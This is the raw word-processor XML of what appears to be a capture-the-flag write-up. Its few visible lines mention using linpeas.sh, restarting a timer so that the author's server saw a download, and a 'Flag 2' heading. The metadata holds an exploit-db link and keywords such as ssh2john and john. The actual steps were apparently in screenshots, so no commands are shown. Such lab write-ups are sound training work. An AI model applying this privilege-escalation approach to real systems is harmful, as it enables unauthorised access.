            </wp:wrapTight>
            <wp:docPr id="174998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823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19F">
        <w:t>I identified this with the help of linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidR="003C5C82">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68961741" w14:textId="2BE48F49" w:rsidR="007307F9" w:rsidRDefault="00EA6E0B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="57F9184C" wp14:editId="7A59BBEF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1335178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="550545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20927"/>
                <wp:lineTo x="21538" y="20927"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="107326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22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44A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251720704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B5C892F" wp14:editId="353D45AA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>20471</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>714186</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="485140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20356"/>
                <wp:lineTo x="21538" y="20356"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="59523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3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44A">
        <w:t>I restarted the timer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B580DF3" w14:textId="0A43412D" w:rsidR="00D3344A" w:rsidRDefault="00EA6E0B">
      <w:r>
        <w:t>My server saw the download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65927B27" w14:textId="1BDE78F0" w:rsidR="007307F9" w:rsidRDefault="00B36A8E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EADD892" wp14:editId="60CF5D56">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>427</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2742857" cy="228571"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19855"/>
                <wp:lineTo x="21455" y="19855"/>
                <wp:lineTo x="21455" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="22934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453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A8E35" w14:textId="267E9097" w:rsidR="007307F9" w:rsidRDefault="00B62581">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251730944" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0131CB41" wp14:editId="607DA8C0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>257222</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2085714" cy="257143"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19248"/>
                <wp:lineTo x="21311" y="19248"/>
                <wp:lineTo x="21311" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="44879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980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A8E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251728896" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BC817B0" wp14:editId="303C1B7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866640" cy="237490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19059"/>
                <wp:lineTo x="21476" y="19059"/>
                <wp:lineTo x="21476" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="56795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595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DA552" w14:textId="6D937BC8" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="56C2A40E" w14:textId="3CFBE4A0" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="55264722" w14:textId="711C8ED4" w:rsidR="007307F9" w:rsidRDefault="002A45A6" w:rsidP="002A45A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc147658985"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251732992" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FCAB534" wp14:editId="6FA05D9D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>317064</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="3214370"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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95970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74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CB2">
        <w:t>Flag 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="00B812F6" w14:textId="247C9C21" w:rsidR="00366CB2" w:rsidRDefault="00366CB2"/>
    <w:p w14:paraId="2FBBE0F5" w14:textId="714B4ED7" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="268E1ED9" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="49D2D1D9" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3EC52A0A" w14:textId="77777777" w:rsidR="007307F9" w:rsidRDefault="007307F9"/>
    <w:p w14:paraId="3D78585B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70CB"/>
    <w:rsid w:val="0001528F"/>
    <w:rsid w:val="00036342"/>
    <w:rsid w:val="000772DE"/>
    <w:rsid w:val="000C191B"/>
    <w:rsid w:val="000C7B8F"/>
    <w:rsid w:val="000D028A"/>
    <w:rsid w:val="001037A0"/>
    <w:rsid w:val="00103C9A"/>
    <w:rsid w:val="00112211"/>
    <w:rsid w:val="00112D49"/>
    <w:rsid w:val="001338AA"/>
    <w:rsid w:val="001405C2"/>
    <w:rsid w:val="0014570F"/>
    <w:rsid w:val="001573E7"/>
    <w:rsid w:val="00190D42"/>
    <w:rsid w:val="001E40B1"/>
    <w:rsid w:val="001E6D67"/>
    <w:rsid w:val="001F4B6F"/>
    <w:rsid w:val="00200DEB"/>
    <w:rsid w:val="002173B9"/>
    <w:rsid w:val="002376F7"/>
    <w:rsid w:val="00263829"/>
    <w:rsid w:val="00286B57"/>
    <w:rsid w:val="002A45A6"/>
    <w:rsid w:val="002E725B"/>
    <w:rsid w:val="00356D28"/>
    <w:rsid w:val="00366CB2"/>
    <w:rsid w:val="003C5C82"/>
    <w:rsid w:val="003F5868"/>
    <w:rsid w:val="00484A98"/>
    <w:rsid w:val="00493F4A"/>
    <w:rsid w:val="004E088D"/>
    <w:rsid w:val="00503705"/>
    <w:rsid w:val="00507D93"/>
    <w:rsid w:val="005215DC"/>
    <w:rsid w:val="005A3301"/>
    <w:rsid w:val="005A61BE"/>
    <w:rsid w:val="005B354A"/>
    <w:rsid w:val="005E334F"/>
    <w:rsid w:val="005F42B9"/>
    <w:rsid w:val="005F494E"/>
    <w:rsid w:val="0061006F"/>
    <w:rsid w:val="006A288B"/>
    <w:rsid w:val="006A7FFB"/>
    <w:rsid w:val="006B6540"/>
    <w:rsid w:val="006C4E6B"/>
    <w:rsid w:val="006F1D51"/>
    <w:rsid w:val="006F44BD"/>
    <w:rsid w:val="007208B0"/>
    <w:rsid w:val="007307F9"/>
    <w:rsid w:val="00732BD6"/>
    <w:rsid w:val="00746E8D"/>
    <w:rsid w:val="007533BC"/>
    <w:rsid w:val="00775F2D"/>
    <w:rsid w:val="007B5765"/>
    <w:rsid w:val="007C0F30"/>
    <w:rsid w:val="007C46B9"/>
    <w:rsid w:val="007D46AE"/>
    <w:rsid w:val="007E5021"/>
    <w:rsid w:val="008445D1"/>
    <w:rsid w:val="0084531C"/>
    <w:rsid w:val="008548CF"/>
    <w:rsid w:val="008A1366"/>
    <w:rsid w:val="008A51C3"/>
    <w:rsid w:val="008D3946"/>
    <w:rsid w:val="0091352F"/>
    <w:rsid w:val="009553A6"/>
    <w:rsid w:val="009855EC"/>
    <w:rsid w:val="00991954"/>
    <w:rsid w:val="009A32B3"/>
    <w:rsid w:val="009C4686"/>
    <w:rsid w:val="009C46CC"/>
    <w:rsid w:val="009F7A69"/>
    <w:rsid w:val="00A234D9"/>
    <w:rsid w:val="00A555B5"/>
    <w:rsid w:val="00A7181A"/>
    <w:rsid w:val="00A73DA2"/>
    <w:rsid w:val="00A81CC8"/>
    <w:rsid w:val="00AA0C5D"/>
    <w:rsid w:val="00AA6941"/>
    <w:rsid w:val="00AB4781"/>
    <w:rsid w:val="00AB53F4"/>
    <w:rsid w:val="00B02076"/>
    <w:rsid w:val="00B36A8E"/>
    <w:rsid w:val="00B46BB2"/>
    <w:rsid w:val="00B506C0"/>
    <w:rsid w:val="00B62581"/>
    <w:rsid w:val="00B82C7C"/>
    <w:rsid w:val="00B86617"/>
    <w:rsid w:val="00BB6B70"/>
    <w:rsid w:val="00BE312F"/>
    <w:rsid w:val="00BF17A3"/>
    <w:rsid w:val="00C1059E"/>
    <w:rsid w:val="00C173B3"/>
    <w:rsid w:val="00C3012F"/>
    <w:rsid w:val="00CC306E"/>
    <w:rsid w:val="00CC70EB"/>
    <w:rsid w:val="00CC7E10"/>
    <w:rsid w:val="00CF4F29"/>
    <w:rsid w:val="00D15B6A"/>
    <w:rsid w:val="00D21621"/>
    <w:rsid w:val="00D3074C"/>
    <w:rsid w:val="00D3190F"/>
    <w:rsid w:val="00D3344A"/>
    <w:rsid w:val="00D4230A"/>
    <w:rsid w:val="00D766FC"/>
    <w:rsid w:val="00D76D42"/>
    <w:rsid w:val="00D96ECE"/>
    <w:rsid w:val="00DC0550"/>
    <w:rsid w:val="00DC5AEA"/>
    <w:rsid w:val="00DD12DD"/>
    <w:rsid w:val="00E02A90"/>
    <w:rsid w:val="00E02C1C"/>
    <w:rsid w:val="00E464AE"/>
    <w:rsid w:val="00E66DFE"/>
    <w:rsid w:val="00E7409B"/>
    <w:rsid w:val="00EA6E0B"/>
    <w:rsid w:val="00EC079F"/>
    <w:rsid w:val="00EC4763"/>
    <w:rsid w:val="00EC6536"/>
    <w:rsid w:val="00F04C87"/>
    <w:rsid w:val="00F3099C"/>
    <w:rsid w:val="00F34F33"/>
    <w:rsid w:val="00F36629"/>
    <w:rsid w:val="00F978AA"/>
    <w:rsid w:val="00FC48C5"/>
    <w:rsid w:val="00FE21B4"/>
    <w:rsid w:val="00FE619F"/>
    <w:rsid w:val="00FF18D9"/>
    <w:rsid w:val="00FF5619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0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1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191B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3F4A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ou">
    <w:name w:val="ou"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D15B6A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00D15B6A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC5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hyperlink" Target="https://www.exploit-db.com/exploits/50036" TargetMode="External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proxy; base64; cookies; python; ssh2john; john; system services</cp:keywords>
  <dc:description/>
  <cp:lastModifiedBy>Michael Vasilio</cp:lastModifiedBy>
  <cp:revision>139</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-08T04:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>